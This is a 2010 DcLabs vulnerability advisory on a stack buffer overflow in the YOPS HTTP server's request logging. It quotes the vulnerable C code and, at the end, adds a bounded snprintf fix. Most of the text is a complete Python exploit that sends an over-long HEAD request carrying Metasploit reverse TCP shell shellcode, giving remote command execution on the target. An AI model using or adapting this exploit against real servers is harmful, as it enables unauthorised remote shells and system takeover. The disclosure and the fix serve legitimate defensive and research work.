
DCA-00015.txt

Posted on 12 September 2010

[DCA-00015]

[Software]
 - YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]
 - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. There are 7 stages (accept, parse, launch, fetch, error, send and log), and pipes are used as interstage channels.

[Bug Description]
 - In the function http_parse_request_header the application performs no boundary check on a malformed buffer received as an HTTP command (HEAD/GET/POST) before the buffer is used as input for the logger variable in the swebs_record_log function.

--- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
        int r;
        int ver, rev;
        char *s, *tok, *l, *prm;
[...]
        r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
        if (r != 2)
                return -400;
[...]
}
--- END snippet ---

--- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
        int err;
        time_t now;
        char timestr[32];
        char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
        sprintf (
                logrec,
                "%s [%s] \"%s\" (%d+%d/%d) %d",
                job->client,
                timestr,
                job->hdr.request_line,
                job->response_hlen,
                job->response_blen_sent,
                job->response_blen,
                job->status
                );
[...]
}
--- END snippet ---

[History]
 - Advisory sent to vendor on 08/26/2010

[Impact]
 - High (Remote Command Execution)

[Affected Version]
 - YOPS 2009-11-30
 - Prior versions may also be vulnerable

[Code]
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

import socket
import sys
import time

HOST = "localhost"
PORT = 8888

# Length of the filler preceding the overwritten return address; overridable
# from the command line.
try:
    BUFF_LEN = int(sys.argv[1])
except (IndexError, ValueError):
    BUFF_LEN = 802

FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
    # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
    "\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
    "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
    "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
    "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
    "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
    "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
    "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

# Over-long request line: filler, repeated fixup address, then the version.
buffer = "HEAD "
buffer += "A" * BUFF_LEN
buffer += FIXUP_ADDR * 4
buffer += " HTTP/1.1"

stackadjust = (
    "\xcb"                    # instruction alignment
    "\xbc\x69\x69\x96\xb0"    # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + " "

print """
######################################
### DcLabs Security Research Group ###
###            +Exploit+           ###
######################################

Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu

Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1 ")
try:
    s.recv(1024)
except socket.error:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

--
Rodrigo Escobar (ipax)
Pentester/Researcher
Security Team @ DcLabs
http://www.dclabs.com.br
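The fix the [Bug Description] calls for, written as an added example rather than the project's own code: the logger formats with a bounded snprintf and checks its return value, and the parser rejects a request line that cannot fit the log buffer. MAX_REQUEST_LINE_LEN's value, the struct layout and the function names are assumptions; the format string and field names mirror the advisory's snippet.

```c
#include <stdio.h>
#include <string.h>

/* Assumed value; the advisory does not state the real one. */
#define MAX_REQUEST_LINE_LEN 1024

/* Stand-in for the JOB fields the logger uses (assumed layout). */
struct job {
    const char *client;
    const char *request_line;
    int response_hlen, response_blen_sent, response_blen, status;
};

/* Bounded replacement for the sprintf() in swebs_record_log.
 * Returns 0 on success, -1 if the record would not fit: snprintf never writes
 * past cap, and checking its return value turns a silent stack overflow into a
 * detected, well-formed "too long" log line. */
int format_log_record(char *logrec, size_t cap, const struct job *job,
                      const char *timestr)
{
    int n = snprintf(logrec, cap, "%s [%s] \"%s\" (%d+%d/%d) %d",
                     job->client, timestr, job->request_line,
                     job->response_hlen, job->response_blen_sent,
                     job->response_blen, job->status);
    if (n < 0 || (size_t)n >= cap) {
        snprintf(logrec, cap, "%s [%s] \"<request line too long: %zu bytes>\" %d",
                 job->client, timestr, strlen(job->request_line), job->status);
        return -1;
    }
    return 0;
}

/* Parser-side check (defence in depth; the logger's own bound is what
 * guarantees no overflow): refuse to store a request line longer than the
 * log buffer at all. Mirrors the -400 convention of http_parse_request_header.
 * Returns 0 if acceptable, -400 otherwise. */
int check_request_line_length(const char *data)
{
    if (strlen(data) > MAX_REQUEST_LINE_LEN)
        return -400;
    return 0;
}
```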
